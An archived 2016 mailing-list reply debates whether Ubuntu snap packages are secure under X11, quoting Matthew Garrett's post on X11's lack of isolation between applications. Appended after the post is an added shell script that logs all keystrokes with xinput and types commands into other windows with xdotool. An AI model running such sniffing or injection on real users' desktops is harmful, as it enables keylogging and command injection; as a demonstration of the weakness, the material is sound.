XDG-APP and D

Anonymouse via Digitalmars-d-announce digitalmars-d-announce at puremagic.com
Sat Apr 23 08:13:15 PDT 2016


On Saturday, 23 April 2016 at 13:56:45 UTC, Joseph Rushton 
Wakeling wrote:
> On Saturday, 23 April 2016 at 11:29:29 UTC, NX wrote:
>> I will just leave it here:
>>
>> http://www.zdnet.com/article/linux-expert-matthew-garrett-ubuntu-16-04s-new-snap-format-is-a-security-risk/
>
> This is FUD.
>
> There are no security risks with snappy packages that there 
> aren't with any other existing Linux packaging systems.

But that's more or less what he's saying though, if you read his 
original blog post. His gripe isn't that it's defective 
security-wise, but rather that it's being marketed as capital-s 
Safe. As long as programs run under the X protocol, everything is 
up for grabs. Snappy doesn't change that fact at all, so widely 
claiming it makes it impossible to steal data would be 
cherry-picking Mir behaviour.


"Snaps are intended to make it easier to distribute applications 
for Ubuntu - they include their dependencies rather than relying 
on the archive, they can be updated on a schedule that's separate 
from the distribution itself and they're confined by a strong 
security policy that makes it impossible for an app to steal your 
data.

At least, that's what Canonical assert. It's true in a sense - if 
you're using Snap packages on Mir (ie, Ubuntu mobile) then 
there's a genuine improvement in security. But if you're using 
X11 (ie, Ubuntu desktop) it's horribly, awfully misleading. Any 
Snap package you install is completely capable of copying all 
your private data to wherever it wants with very little 
difficulty.

The problem here is the X11 windowing system. X has no real 
concept of different levels of application trust. Any application 
can register to receive keystrokes from any other application. 
Any application can inject fake key events into the input stream. 
An application that is otherwise confined by strong security 
policies can simply type into another window. An application that 
has no access to any of your private data can wait until your 
session is idle, open an unconfined terminal and then use curl to 
send your data to a remote site. As long as Ubuntu desktop still 
uses X11, the Snap format provides you with very little 
meaningful security. Mir and Wayland both fix this, which is why 
Wayland is a prerequisite for the sandboxed xdg-app design."


Sandboxing is good but I'm not convinced shipping duplicates of 
libraries with each program is. Packages were meant to solve this 
and they do, though .so version conflicts are a thing (albeit a 
rare one).
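The X11 weakness the quoted post describes (any client on the same display can watch every keystroke and type into any other window) is easy to reproduce with stock X utilities. The script below is an added example, not code from the original post, from Canonical or from the snap project. It assumes a running X11 session with `xdotool` and `xinput` installed, and uses `xterm` as a placeholder window class and a harmless `echo` as the injected command.

```sh
#!/bin/sh
# Added example (not from the original post, Canonical or snapd).
# Demonstrates the X11 property the quoted post relies on: any client
# connected to $DISPLAY can sniff keystrokes and inject key events into
# other windows, with no privilege beyond the display connection.
# Assumes xdotool and xinput are installed; "xterm" is a placeholder class.

# Classify the display server the session really uses. Key injection
# and sniffing below work only on X11. Note the caveat that X clients
# running under XWayland can still see each other, just not native
# Wayland clients.
session_type() {
    if [ -n "${WAYLAND_DISPLAY:-}" ] || [ "${XDG_SESSION_TYPE:-}" = "wayland" ]; then
        echo wayland
    elif [ -n "${DISPLAY:-}" ]; then
        echo x11
    else
        echo none
    fi
}

# Sniff: list input devices, then stream raw XInput2 key/button events
# for the whole screen. Every keystroke in every window shows up here.
sniff_keys() {
    xinput list --short
    xinput test-xi2 --root
}

# Inject: locate a window by class and type a command into it, which is
# exactly the "open a terminal and type" attack from the quoted post.
# A confined app can do this because X does not know who is typing.
inject_into_window() {
    class="$1"; text="$2"
    win=$(xdotool search --classname "$class" | head -n1)
    [ -n "$win" ] || { echo "no window with class $class" >&2; return 1; }
    xdotool windowactivate --sync "$win"
    xdotool type --window "$win" --delay 50 "$text"
    xdotool key --window "$win" Return
}

# Only run the live demo when asked, so sourcing the file is harmless.
if [ "${RUN_X11_DEMO:-0}" = 1 ]; then
    [ "$(session_type)" = x11 ] || { echo "not an X11 session"; exit 1; }
    inject_into_window xterm "echo injected from another X client"
fi
```

Run it with `RUN_X11_DEMO=1 sh x11_demo.sh` while an xterm is open; the text appears in the terminal as if you had typed it. Run `sniff_keys` in one terminal and type in another to see the other direction. Neither step needs root, a setuid helper, or any access to the target process, which is why the confinement snap applies to the process itself does not help on an X11 desktop.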

